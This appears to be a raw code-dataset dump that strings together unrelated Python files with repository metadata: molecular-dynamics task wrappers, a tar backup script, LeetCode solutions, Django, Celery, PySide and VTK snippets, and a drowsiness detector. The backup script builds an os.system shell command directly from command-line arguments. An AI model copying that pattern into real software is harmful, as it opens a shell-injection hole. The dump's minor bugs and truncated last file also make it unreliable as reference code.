@task(input_top_path=FILE_IN, input_crd_path=FILE_IN, output_log_path=FILE_OUT, output_traj_path=FILE_OUT, output_rst_path=FILE_OUT, input_mdin_path=FILE_IN, input_cpin_path=FILE_IN, input_ref_path=FILE_IN, output_cpout_path=FILE_OUT, output_cprst_path=FILE_OUT, output_mdinfo_path=FILE_OUT,
on_failure="IGNORE", time_out=task_time_out)
def _pmemdmdrun(input_top_path, input_crd_path, output_log_path, output_traj_path, output_rst_path, input_mdin_path, input_cpin_path, input_ref_path, output_cpout_path, output_cprst_path, output_mdinfo_path, properties, **kwargs):
task_config.config_multinode(properties)
try:
PmemdMDRun(input_top_path=input_top_path, input_crd_path=input_crd_path, output_log_path=output_log_path, output_traj_path=output_traj_path, output_rst_path=output_rst_path, input_mdin_path=input_mdin_path, input_cpin_path=input_cpin_path, input_ref_path=input_ref_path, output_cpout_path=output_cpout_path, output_cprst_path=output_cprst_path, output_mdinfo_path=output_mdinfo_path, properties=properties, **kwargs).launch()
except Exception as e:
traceback.print_exc()
raise e
finally:
sys.stdout.flush()
sys.stderr.flush()
def pmemd_mdrun(input_top_path, input_crd_path, output_log_path, output_traj_path, output_rst_path, input_mdin_path=None, input_cpin_path=None, input_ref_path=None, output_cpout_path=None, output_cprst_path=None, output_mdinfo_path=None, properties=None, **kwargs):
if (output_log_path is None or (os.path.exists(output_log_path) and os.stat(output_log_path).st_size > 0)) and \
(output_traj_path is None or (os.path.exists(output_traj_path) and os.stat(output_traj_path).st_size > 0)) and \
(output_rst_path is None or (os.path.exists(output_rst_path) and os.stat(output_rst_path).st_size > 0)) and \
(output_cpout_path is None or (os.path.exists(output_cpout_path) and os.stat(output_cpout_path).st_size > 0)) and \
(output_cprst_path is None or (os.path.exists(output_cprst_path) and os.stat(output_cprst_path).st_size > 0)) and \
(output_mdinfo_path is None or (os.path.exists(output_mdinfo_path) and os.stat(output_mdinfo_path).st_size > 0)) and \
True:
print("WARN: Task PmemdMDRun already executed.")
else:
_pmemdmdrun( input_top_path, input_crd_path, output_log_path, output_traj_path, output_rst_path, input_mdin_path, input_cpin_path, input_ref_path, output_cpout_path, output_cprst_path, output_mdinfo_path, properties, **kwargs) | [
"[email protected]"
] | |
7be70ac3312c262cb16fc7fdd8dcb45124a48f14 | d2b2023261ccdcaf560a2e7b0bab13ecdedacfc9 | /03/fullbackup.py | 00cb6631683557864d36d5b2b9b06ca824c29799 | [] | no_license | lilyef2000/lesson | a9d96ffc19f68fa3f044f240de6496b6d69394f6 | 2a5abb00b9bbb8bb36602ea6e1e8c464accc0759 | refs/heads/master | 2021-01-10T08:41:14.524421 | 2016-01-01T18:04:04 | 2016-01-01T18:04:04 | 46,460,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 879 | py | #!/usr/bin/python
import sys,os,time,logger
source_file = sys.argv[1]
formated_source_file = source_file.split('/')[-1]
backup_dir = '/home/Administrator/lesson/backup/'
backup_to_file = '''%s%s_%s.tgz'''% (backup_dir,formated_source_file,time.strftime("%Y%m%d%H%M%S",time.localtime()))
def run_backup(runtime='now',exclude_file_name='None'):
if len(sys.argv) == 4:
print '--------exclude file mode--------'
if sys.argv[2] == '-X':
exclude_file_name = sys.argv[3]
backup_cmd = "tar -cvzfX %s %s %s " %(backup_to_file,exclude_file_name,source_file)
else:
print '--------Normal mode:--------'
backup_cmd = "tar -cvzf %s %s |wc -l" %(backup_to_file,source_file)
run_command = os.system(backup_cmd)
if run_command == 0:
logger.record_log('Full Backup','Success','N/A','test')
else:
logger.record_log('Full Backup','Failure','N/A','test')
run_backup()
| [
"[email protected]"
] | |
85dbdd459b8e5552ad1d55043b0a1f5779b84c91 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_20926.py | 194a6671b01c6bb8bdc4a0d1f301faf7b48d8ed5 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32 | py | # Modifying sys.path
PYTHONPATH
| [
"[email protected]"
] | |
c82afac573bf870007f2a26a2677f45d8e51d99c | 04ae1836b9bc9d73d244f91b8f7fbf1bbc58ff29 | /1233/solution.py | c47461e1a3ab14eb3051ffb577ac9f8ff8d4de5e | [] | no_license | zhangruochi/leetcode | 6f739fde222c298bae1c68236d980bd29c33b1c6 | cefa2f08667de4d2973274de3ff29a31a7d25eda | refs/heads/master | 2022-07-16T23:40:20.458105 | 2022-06-02T18:25:35 | 2022-06-02T18:25:35 | 78,989,941 | 14 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,365 | py | class Node():
def __init__(self, str_):
self.str_ = str_
def __eq__(self, other):
return self.str_ == other.str_
def __repr__(self):
return self.str_
def __repr__(self):
return self.str_
def __hash__(self):
return hash(self.str_)
def __call__(self,str_):
return Node(str_)
class Solution:
def removeSubfolders(self, folder: List[str]) -> List[str]:
trie = {}
res = []
def transfrom(f):
return list(map(Node, f.strip("/").split("/")))
folder = list( map(transfrom, folder))
print(folder)
for f in folder:
trie_pointer = trie
for char in f:
trie_pointer = trie_pointer.setdefault(char, {})
trie_pointer["#"] = "#"
def combine(path):
return "/"+"/".join([str(node) for node in path])
def dfs(trie, path):
nonlocal res
if "#" in trie:
res.append(combine(path))
return
for char in trie:
path.append(char)
dfs(trie[char],path)
path.pop()
dfs(trie, [])
return res
| [
"[email protected]"
] | |
3259d0615171353e16e44fb0506a5558587028c0 | d037002f9d2b383ef84686bbb9843dac8ee4bed7 | /tutorials/Trash/Distributed-DRL/torch/sac_test/utils/environment.py | c86069ea34cea9e7eb5b64d4846270b3babd3d96 | [
"MIT"
] | permissive | ICSL-hanyang/Code_With_RL | 4edb23ca24c246bb8ec75fcf445d3c68d6c40b6d | 1378996e6bf6da0a96e9c59f1163a635c20b3c06 | refs/heads/main | 2023-08-15T18:37:57.689950 | 2021-10-18T07:31:59 | 2021-10-18T07:31:59 | 392,944,467 | 0 | 0 | null | 2021-08-05T07:20:57 | 2021-08-05T07:20:56 | null | UTF-8 | Python | false | false | 971 | py | import gym
class Environment:
def __init__(self,env_name):
self.env = gym.make(env_name)
self.state_dim = self.env.observation_space.shape[0]
self._max_episode_steps = self.env._max_episode_steps
self.can_run = False
self.state = None
if type(self.env.action_space) == gym.spaces.box.Box : #Continuous
self.action_dim = self.env.action_space.shape[0]
self.is_discrete = False
else :
self.action_dim = self.env.action_space.n
self.is_discrete = True
def reset(self):
assert not self.can_run
self.can_run = True
self.state = self.env.reset()
return self.state
def step(self,action):
assert self.can_run
next_state, reward, done, info = self.env.step(action)
self.state = next_state
if done == True:
self.can_run = False
return next_state, reward, done, info | [
"[email protected]"
] | |
b55e30d6f12b49a52c2c808328cfba62b35668cb | 71711bd2c11a3c0cbbc99bcfa78384d005e07828 | /puct_mcts/datasets.py | f2aa99600a387a45d927073b70ec24d3e7ff95c7 | [
"BSD-3-Clause"
] | permissive | kastnerkyle/exploring_species_counterpoint | 9365b2485cd227e375521f769ba1bfbd62c7b629 | dda762463e64036adeba7efd46c51daaaf906019 | refs/heads/master | 2021-09-13T10:55:03.096300 | 2018-04-28T19:00:21 | 2018-04-28T19:00:21 | 103,225,538 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14 | py | ../datasets.py | [
"[email protected]"
] | |
e5679a098872822f28be752dec6bb6519196d5b7 | 8a5ab3d33e3b653c4c64305d81a85f6a4582d7ac | /PySide/QtCore/QTimer.py | 5e91243992b9f324a3a089a65f93db3242e8a538 | [
"Apache-2.0"
] | permissive | sonictk/python-skeletons | be09526bf490856bb644fed6bf4e801194089f0d | 49bc3fa51aacbc2c7f0c7ab86dfb61eefe02781d | refs/heads/master | 2020-04-06T04:38:01.918589 | 2016-06-09T20:37:43 | 2016-06-09T20:37:43 | 56,334,503 | 0 | 0 | null | 2016-04-15T16:30:42 | 2016-04-15T16:30:42 | null | UTF-8 | Python | false | false | 1,511 | py | # encoding: utf-8
# module PySide.QtCore
# from /corp.blizzard.net/BFD/Deploy/Packages/Published/ThirdParty/Qt4.8.4/2015-05-15.163857/prebuilt/linux_x64_gcc41_python2.7_ucs4/PySide/QtCore.so
# by generator 1.138
# no doc
# no imports
from QObject import QObject
class QTimer(QObject):
# no doc
def interval(self, *args, **kwargs): # real signature unknown
pass
def isActive(self, *args, **kwargs): # real signature unknown
pass
def isSingleShot(self, *args, **kwargs): # real signature unknown
pass
def killTimer(self, *args, **kwargs): # real signature unknown
pass
def setInterval(self, *args, **kwargs): # real signature unknown
pass
def setSingleShot(self, *args, **kwargs): # real signature unknown
pass
def singleShot(self, *args, **kwargs): # real signature unknown
pass
def start(self, *args, **kwargs): # real signature unknown
pass
def startTimer(self, *args, **kwargs): # real signature unknown
pass
def stop(self, *args, **kwargs): # real signature unknown
pass
def timerEvent(self, *args, **kwargs): # real signature unknown
pass
def timerId(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *more): # real signature unknown; restored from __doc__
""" x.__init__(...) initializes x; see help(type(x)) for signature """
pass
staticMetaObject = None
timeout = None
__new__ = None
| [
"[email protected]"
] | |
800613bb979e2a651e7833167d3b6536f748963a | 699add6df73ad158b8ebeb5f9de4aada5820f205 | /facebook/app/posts/models/comments.py | 51bab010f0aef4c5c779bd1f65e15e568916fbfe | [] | no_license | ricagome/Api-Facebook-Clone | 4f035ad280e6cb48d375fd87a9f62eecce67eb51 | fae5c0b2e388239e2e32a3fbf52aa7cfd48a7cbb | refs/heads/main | 2023-08-17T12:34:33.379017 | 2021-10-05T21:23:32 | 2021-10-05T21:23:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 694 | py | """Comment model."""
# Django
from django.db import models
# Utilities
from app.utils.models import FbModel
class Comment(FbModel):
"""Comment model."""
user = models.ForeignKey('users.User', on_delete=models.CASCADE)
profile = models.ForeignKey('users.Profile', on_delete=models.CASCADE)
post = models.ForeignKey('posts.Post', on_delete=models.CASCADE)
text = models.TextField(help_text='write a comment', max_length=250)
reactions = models.IntegerField(default=0)
def __str__(self):
"""Return username, post title and comment."""
return '@{} has commented {} on {}'.format(
self.user.username,
self.text, self.post) | [
"[email protected]"
] | |
5483a62a0289eaf03b82b517c8e78dd11f7e8a9d | 4a2f163e603f90d5b9a4b2a100d7bc7bc77d1c95 | /predicting_biological_response/hemy_example.py | 401b7f3d5dd2f883930c7bfdf5ca5cfa2b058519 | [] | no_license | tusonggao/data_cck | d781334bd1d425f6ecd613ebdb194835846e3adb | 91d48589e8431fd00d70348dcb049c52fdcd2c7f | refs/heads/master | 2020-04-09T03:59:09.931284 | 2020-01-26T15:54:14 | 2020-01-26T15:54:14 | 160,005,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | # https://blog.csdn.net/data_scientist/article/details/79036382
# https://blog.csdn.net/Gin077/article/details/84339790
# https://github.com/rushter/heamy
| [
"[email protected]"
] | |
88e7be6d96ec8e784aba5e12b0692d4c5beb1949 | 2db7597686f33a0d700f7082e15fa41f830a45f0 | /Python/LeetCode2.0/DP/72.Edit Distance.py | b071302d4d3bdf3daf32936c19f8404f75c65131 | [] | no_license | Leahxuliu/Data-Structure-And-Algorithm | 04e0fc80cd3bb742348fd521a62bc2126879a70e | 56047a5058c6a20b356ab20e52eacb425ad45762 | refs/heads/master | 2021-07-12T23:54:17.785533 | 2021-05-17T02:04:41 | 2021-05-17T02:04:41 | 246,514,421 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,595 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time : 2020/05/09
'''
input: two words: str; the length of word is from 0 to inf
output: int; the number of modify steps
corner case:
one of the word is ‘’ → len(word2)
both words are ‘’ → 0
Method - DP
Steps:
build DP table; the size of table is (len(word1) + 1)* (len(word2) + 1)
dp[i][j]: the optimal solution when the size of word1 is i, the size of word2 is j
dp[i][j] = dp[i-1][j-1], word1[i - 1] != word2[j - 1]
= min(dp[i][j-1], dp[i-1][j],dp[i-1][j-1]) + 1, word1[i - 1] == word2[j - 1]
result is dp[len(word2)][len(word1)]
base case:
dp[0][j] = j
dp[i][0] = i
Time Complexity: O(NM), N is the length of word1 and M is the length of word2
Space Complexity: O(NM), DP table’s size
'''
# 易错点,注意哪个word是行,哪个word是列; word1[i - 1] != word2[j - 1], 减1不能忘
class Solution:
def minDistance(self, word1: str, word2: str) -> int:
m = len(word1)
n = len(word2)
if m == 0:
return n
if n == 0:
return m
dp = [[0] * (m + 1) for _ in range(n + 1)]
for i in range(n + 1):
for j in range(m + 1):
if i == 0:
dp[i][j] = j
elif j == 0:
dp[i][j] = i
elif word2[i - 1] == word1[j - 1]:
dp[i][j] = dp[i - 1][j - 1]
else:
dp[i][j] = min(dp[i][j - 1], dp[i - 1][j], dp[i - 1][j - 1]) + 1
return dp[n][m] | [
"[email protected]"
] | |
9aa84188689bfa3d627c30002874472a97dc229a | 499ff5445e2017d042690c0429cf2e767a7f623f | /coral/io/_abi.py | b19a2ab0ec287ad6d000026ece9b71f749677f3a | [
"MIT"
] | permissive | blthree/coral | b6ab934c10271d7b790130fe45e622b7c66921b4 | 30514735d9a51487583535a3a7e3fbfd0fe15ed8 | refs/heads/master | 2021-01-22T10:14:52.018579 | 2017-02-19T00:28:33 | 2017-02-19T00:28:33 | 81,997,699 | 0 | 0 | null | 2017-02-14T22:58:59 | 2017-02-14T22:58:59 | null | UTF-8 | Python | false | false | 3,069 | py | '''Read and write DNA sequences.'''
import coral as cr
import numpy as np
import os
from . import parsers
from .exceptions import UnsupportedFileError
def read_abi(path, trim=True, attach_trace=True):
'''Read a single ABI/AB1 Sanger sequencing file.
:param path: Full path to input file.
:type path: str
:param trim: Determines whether the sequence will be trimmed using Richard
Mott's algorithm (trims based on quality).
:type trim: bool
:param attach_trace: Determines whether to attach the trace result as a
.trace attribute of the returned sequence and the
trace peak locations as a .tracepeaks attribute. The
trace attribute is a 2D numpy array with 4 columns in
the order GATC.
:type attach_trace: bool
:returns: DNA sequence.
:rtype: coral.DNA
'''
filename, ext = os.path.splitext(os.path.split(path)[-1])
abi_exts = ['.abi', '.ab1']
if ext in abi_exts:
with open(path) as f:
abi = parsers.ABI(f)
else:
raise UnsupportedFileError('File format not recognized.')
seq = abi.seq_remove_ambig(abi.seq)
# Attach the trace results to the seq
if attach_trace:
order = abi.data['baseorder'].upper()
trace = [abi.data['raw' + str(order.index(b) + 1)] for b in 'GATC']
trace = np.array(trace)
tracepeaks = np.array(abi.data['tracepeaks'])
if trim:
try:
sequence = cr.DNA(abi.trim(seq))
except ValueError:
# A ValueError is raised if the sequence is too short
pass
trim_start = seq.index(str(sequence))
# Adjust trace data based on trimming
idx = (trim_start, trim_start + len(sequence))
peaks = tracepeaks[idx[0]:idx[1]]
sequence.trace = trace[peaks[0]:peaks[-1], :]
sequence.tracepeaks = peaks
else:
sequence = cr.DNA(seq)
sequence.name = abi.name
return sequence
def read_abis(directory, trim=True, attach_trace=True):
'''Read all ABI sequences files in a directory.
:param directory: Path to directory containing sequencing files.
:type directory: str
:param trim: Determines whether the sequence will be trimmed using Richard
Mott's algorithm (trims based on quality).
:type trim: bool
:param attach_trace: Determines whether to attach the trace result as a
.trace attribute of the returned sequence. The trace
attribute is a 2D numpy array with 4 columns in the
order GATC.
:type attach_trace: bool
:returns: A list of DNA sequences.
:rtype: coral.DNA list
'''
dirfiles = os.listdir(directory)
abis = []
for dirfile in dirfiles:
path = os.path.join(directory, dirfile)
try:
abis.append(read_abi(path, trim=trim, attach_trace=attach_trace))
except UnsupportedFileError:
pass
return abis
| [
"[email protected]"
] | |
0d3b60023a60eed6ae0274a83fd1daecbd04b513 | 95749b75c446df3ce4aabb03d5aec90de793e207 | /gemini/taskapp/celery.py | 722f621c5679f886e12c4c93ba9692df4ba43474 | [] | no_license | Hawk94/gemini | 8288a11499c4cc12c8c79641a51b5e99afe268c5 | 3a4d0b13488b8e9fbc40dc3cde338b61bc04b494 | refs/heads/master | 2020-06-24T11:37:22.204269 | 2017-07-12T20:33:21 | 2017-07-12T20:33:21 | 96,935,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,398 | py |
import os
from celery import Celery
from django.apps import apps, AppConfig
from django.conf import settings
if not settings.configured:
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.local') # pragma: no cover
app = Celery('gemini')
class CeleryConfig(AppConfig):
name = 'gemini.taskapp'
verbose_name = 'Celery Config'
def ready(self):
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
installed_apps = [app_config.name for app_config in apps.get_app_configs()]
app.autodiscover_tasks(lambda: installed_apps, force=True)
if hasattr(settings, 'RAVEN_CONFIG'):
# Celery signal registration
from raven import Client as RavenClient
from raven.contrib.celery import register_signal as raven_register_signal
from raven.contrib.celery import register_logger_signal as raven_register_logger_signal
raven_client = RavenClient(dsn=settings.RAVEN_CONFIG['DSN'])
raven_register_logger_signal(raven_client)
raven_register_signal(raven_client)
@app.task(bind=True)
def debug_task(self):
print('Request: {0!r}'.format(self.request)) # pragma: no cover
| [
"[email protected]"
] | |
2df9cffd7c706f44089b51dd1178e45e110bfbc7 | 8149d1030b5bc62cc82d5afedbe7486daedbf8c5 | /[829][Consecutive Numbers Sum][Medium].py | 4810671219d8327bd315d73d7fbaf90d1a403a40 | [] | no_license | guofei9987/leetcode_python | faef17bb59808197e32ed97e92e2222862e2ba8c | 23703a6fb5028d982b3febc630e28f9bb65a82a6 | refs/heads/master | 2020-03-21T18:24:33.014579 | 2019-10-12T13:29:03 | 2019-10-12T13:29:03 | 138,889,760 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 55 | py | # https://leetcode.com/problems/consecutive-numbers-sum | [
"[email protected]"
] | |
cfd392a9079699ee6d0b693e945546b5a1178576 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_301/ch41_2019_04_04_16_40_15_344267.py | 6c41a0d67bc67884cf85bc1629a7262fa142531b | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 102 | py | a=input('que palavra? ')
while a!='desisto':
a=input('que palavra? ')
print(voce acertou)
| [
"[email protected]"
] | |
346dfc71b0db9a749e8ee1d65b7425c276ff9cb1 | 4577d8169613b1620d70e3c2f50b6f36e6c46993 | /students/1797637/homework01/program03.py | 1dea672b0e9890cc0e4a8907a314950ef5731495 | [] | no_license | Fondamenti18/fondamenti-di-programmazione | cbaf31810a17b5bd2afaa430c4bf85d05b597bf0 | 031ec9761acb1a425fcc4a18b07884b45154516b | refs/heads/master | 2020-03-24T03:25:58.222060 | 2018-08-01T17:52:06 | 2018-08-01T17:52:06 | 142,419,241 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,579 | py | def codifica(chiave, testo):
''' Viene codificato e restituito un testo, fornito il testo stesso e una chiave di codifica'''
codifica=codifica_chiave(chiave)
for indice,carattere in enumerate(testo):
if carattere in codifica.keys(): testo = testo[:indice]+ testo[indice:].replace(testo[indice],codifica[carattere],1)
return testo
def decodifica(chiave, testo):
''' Viene decodificato e restituito un testo, fornito il testo stesso e una chiave di codifica'''
decodifica=decodifica_chiave(chiave)
for indice,carattere in enumerate(testo):
if carattere in decodifica.keys(): testo = testo[:indice]+ testo[indice:].replace(testo[indice],decodifica[carattere],1)
return testo
def codifica_chiave(chiave):
chiave=processa_chiave(chiave)
chiave_ord=''.join(sorted(chiave))
codifica={}
for indice,carattere in enumerate(chiave_ord): codifica[carattere]=chiave[indice]
return codifica
def decodifica_chiave(chiave):
chiave=processa_chiave(chiave)
chiave_ord=''.join(sorted(chiave))
decodifica={}
for indice,carattere in enumerate(chiave): decodifica[carattere]=chiave_ord[indice]
return decodifica
def processa_chiave(chiave):
for carattere in chiave:
if ord(carattere)<ord('a') or ord(carattere)>ord('z'): chiave= chiave.replace(carattere,'')
chiave=elimina_copie(chiave)
return chiave
def elimina_copie(chiave):
for carattere in chiave:
if carattere in chiave[chiave.find(carattere)+1:]: chiave= chiave.replace(carattere,'',1)
return chiave | [
"[email protected]"
] | |
8ccd44a76e64b8cc0ad921f213460c409e895266 | cc7b4e71b3c27240ec650a75cc6f6bbab5e11387 | /crdb/templatetags/email_tags.py | b13eedd6c32b7950e6ee3313c89e155c42547e14 | [
"MIT"
] | permissive | jsayles/CoworkingDB | 0cdada869d950a28cfef20d1b9c1eb3eb4d7b1c2 | 78776910eba0354a7fd96b2e2c53a78e934d8673 | refs/heads/master | 2023-02-22T23:11:19.040799 | 2021-12-28T19:13:39 | 2021-12-28T19:13:39 | 883,951 | 3 | 0 | MIT | 2023-02-15T17:59:10 | 2010-09-02T18:36:43 | Python | UTF-8 | Python | false | false | 764 | py | import os
from django.template import Library
from django import template
from django.conf import settings
from django.utils.html import format_html
from django.urls import reverse
from crdb.models import EmailAddress
register = template.Library()
@register.simple_tag
def email_verified(email):
if not email:
return None
if not isinstance(email, EmailAddress):
# Got a string so we should pull the object from the database
email = EmailAddress.objects.get(email=email)
if email.is_verified():
return ""
html = '<span style="color:red;">( <a target="_top" style="color:red;" href="{}">{}</a> )</span>'
link = email.get_send_verif_link()
label = "Not Verified"
return format_html(html, link, label)
| [
"[email protected]"
] | |
e8b2f8c81f953e4c0e4a8d266dceb71804203e01 | 7f25740b1ef47edc24db1a3618b399959b073fe1 | /1029_17_smallproject.py | 97673d239a34ef5759856f9eeba050bcf1977446 | [] | no_license | pjh9362/PyProject | b2d0aa5f8cfbf2abbd16232f2b55859be50446dc | 076d31e0055999c1f60767a9d60e122fb1fc913e | refs/heads/main | 2023-01-09T12:12:06.913295 | 2020-11-07T15:32:03 | 2020-11-07T15:32:03 | 306,814,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 198 | py | cost = int(input())
cpn = input()
if cpn == "Cash3000":
print(cost-3000)
elif cpn == "Cash5000":
print(cost-5000)
else:
print("쿠폰이 적용되지 않았습니다.")
print(cost)
| [
"[email protected]"
] | |
385836ada1f0c7aa8919ec7aeb97acca6aea94c0 | 644b13f90d43e9eb2fae0d2dc580c7484b4c931b | /network2.py | 5dbc8833c5526d15e355e3169680c46c4a5bc280 | [] | no_license | yeonnseok/ps-algorithm | c79a41f132c8016655719f74e9e224c0870a8f75 | fc9d52b42385916344bdd923a7eb3839a3233f18 | refs/heads/master | 2020-07-09T11:53:55.786001 | 2020-01-26T02:27:09 | 2020-01-26T02:27:09 | 203,962,358 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,318 | py | def cal_ans():
temp = []
ans = 0
for i in range(len(src)):
if src[i] == 0:
if len(temp) == 5:
temp = temp[1:]
temp.append(i)
else:
ans += i * len(temp) - sum(temp)
for j in temp:
link[i + 1].append(j + 1)
link[j + 1].append(i + 1)
return ans
def cal_group():
cnt, group = 0, 0
zero_one = False
start, end = -1, 0
for i in range(len(src)):
start = i + 1
if src[i] == 1:
group += 1
else:
break
for i in range(len(src) - 1, -1, -1):
end = i + 1
if src[i] == 0:
group += 1
else:
break
for i in range(start, end):
if src[i] == 0:
cnt += 1
elif src[i] == 1:
if cnt >= 5:
group += (cnt - 4)
elif i >= 1 and src[i-1] == 0:
zero_one = True
cnt = 0
if zero_one and len(src) != 1:
return group + 1
return group
num_of_case = int(input())
for case in range(1, num_of_case + 1):
n = int(input())
src = list(map(int, input().split()))
link = [[] for _ in range(n + 1)]
print("#%d" % case, end=" ")
print(cal_ans(), end=" ")
print(cal_group())
| [
"[email protected]"
] | |
ab0b8196c759f436a72d4ad731e16756cc9d4511 | 699cf40f6326b954a40b78e87317a62401bd4c2c | /.history/Drowsy_Detection_20210728124624.py | 935884724404299f8e03c238ed4ff5289a4858c5 | [] | no_license | KhanhNguyen1308/Python-mediapippe | e3927f9c0c6499d8a3ba50a675617b89197dce89 | 981412efd39bd29c34a66afbec88abdabcb47ab9 | refs/heads/main | 2023-06-25T18:37:43.234063 | 2021-07-29T11:35:31 | 2021-07-29T11:35:31 | 368,535,068 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,727 | py | import cv2
import time
import numpy as np
import mediapipe as mp
import tensorflow as tf
from threading import Thread
from head_pose_ratio import head_pose_ratio
from function import draw_point, eye_avg_ratio, put_text
from Angle_head_pose_ratio import head_pose_status, eye_stat
from mode import sleep_mode
interpreter = tf.lite.Interpreter('model.tflite')
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
cap = cv2.VideoCapture('Video/test_1406.mp4')
# cap = cv2.VideoCapture(0)
pTime = 0
time_active = 0
m = 0
status = ''
mpDraw = mp.solutions.drawing_utils
mpFaceMesh = mp.solutions.face_mesh
faceMesh = mpFaceMesh.FaceMesh()
drawSpec = mpDraw.DrawingSpec(thickness=1, circle_radius=2)
eye_status = ''
x_status = ''
y_status = ''
z_status = ''
head_status = ''
Drowsy_mode = ''
draw = False
t = 0
ear = 0
start_time = time.time()
count = 0
blink = 0
blink_perM = 0
pre_blink = 0
while True:
ret, img = cap.read()
ih, iw = img.shape[0], img.shape[1]
imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
results = faceMesh.process(imgRGB)
if results:
face = []
Mount = []
Left_eye = []
Right_eye = []
try:
for face_lms in results.multi_face_landmarks:
for lm in face_lms.landmark:
x, y = int(lm.x * iw), int(lm.y * ih)
face.append([x, y])
nose = face[5]
Left_eye.append([face[249], face[374], face[380], face[382], face[385], face[386]])
Right_eye.append([face[7], face[145], face[153], face[155], face[158], face[159]])
Mount.append([face[308], face[317], face[14], face[87], face[61], face[82], face[13], face[312]])
img = draw_point(img, nose, Left_eye, Right_eye, Mount)
ear = eye_avg_ratio(Left_eye, Right_eye)
x1, x2, x3, x4, x5, x6 = head_pose_ratio(nose, Left_eye, Right_eye)
input_shape = input_details[0]['shape']
input_data = np.array((x1, x2, x3, x4, x5, x6), dtype=np.float32)
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
img = cv2.putText(img, str(x5), (nose[0] - 20, nose[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 1)
img = cv2.putText(img, str(x6), (nose[0] + 20, nose[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 1)
head_status, mode = head_pose_status(x5, x6, x2)
eye_status, blink, count = eye_stat(ear, count, blink, mode)
if mode == 1:
print(round(ear, 3))
Drowsy_mode = sleep_mode(mode, ear, blink)
m += 1
except:
eye_status = 'None Face'
x_status = 'None Face'
y_status = 'None Face'
cTime = time.time()
fps = int(1 / (cTime - pTime))
pTime = cTime
img = cv2.putText(img, str(m), (10, 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), 1)
text_fps = 'FPS:' + str(fps)
text_EaR = 'Eye_avg_Ratio: ' + str(round(ear, 2))
text_Head_pose = 'Head_pose: ' + head_status
text_ES = 'Eye_Status: ' + eye_status
text_blink = 'Blink_Num: ' + str(blink)
text_blink_avg = 'Blink_AVG: ' + str(blink_perM)
img = put_text(img, text_fps, text_EaR, text_ES, text_blink, text_blink_avg, text_Head_pose)
cv2.imshow('results', img)
if (time.time() - start_time) > 60:
start_time = time.time()
time_active += 1
blink_perM = blink
pre_blink = blink
blink = 0
key = cv2.waitKey(1)
# if m == 900:
# break
if key == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
| [
"[email protected]"
] | |
181d7604566e31eea4b774b2ae9b3356926009e6 | a40950330ea44c2721f35aeeab8f3a0a11846b68 | /VTK/Actors/ThreeLine.py | e780418bfccbe2f4be8ca077eaf8f0c68c4225b5 | [] | no_license | huang443765159/kai | 7726bcad4e204629edb453aeabcc97242af7132b | 0d66ae4da5a6973e24e1e512fd0df32335e710c5 | refs/heads/master | 2023-03-06T23:13:59.600011 | 2023-03-04T06:14:12 | 2023-03-04T06:14:12 | 233,500,005 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,218 | py | import vtk
# Visualize
colors = vtk.vtkNamedColors()
# Create points
p0 = [0.0, 0.0, 0.0]
p1 = [1.0, 0.0, 0.0]
p2 = [1.0, 1.0, 0.0]
p3 = [0.0, 1.0, 0.0]
p4 = [2.0, 0.0, 0.0]
p5 = [2.0, 1.0, 0.0]
# LineSource: draw a line with two points
def createLine1():
lineSource = vtk.vtkLineSource()
lineSource.SetPoint1(p1)
lineSource.SetPoint2(p2)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(lineSource.GetOutputPort())
return mapper
# LineSource Multi-point continuous straight line
def createLine2():
lineSource = vtk.vtkLineSource()
points = vtk.vtkPoints()
points.InsertNextPoint(p0)
points.InsertNextPoint(p1)
points.InsertNextPoint(p2)
points.InsertNextPoint(p3)
lineSource.SetPoints(points)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(lineSource.GetOutputPort())
return mapper
# LineSource multi-point set geometry + topology
def createLine3(): # 多条线添加 一个points_actor添加多条线段
# Create a vtkPoints object and store the points in it
points = vtk.vtkPoints()
points.InsertNextPoint(p0)
points.InsertNextPoint(p1)
points.InsertNextPoint(p2)
points.InsertNextPoint(p3)
points.InsertNextPoint(p4)
points.InsertNextPoint(p5)
# Create a cell array to store the lines in and add the lines to it
lines = vtk.vtkCellArray()
# for i in range(0, 5, 2):
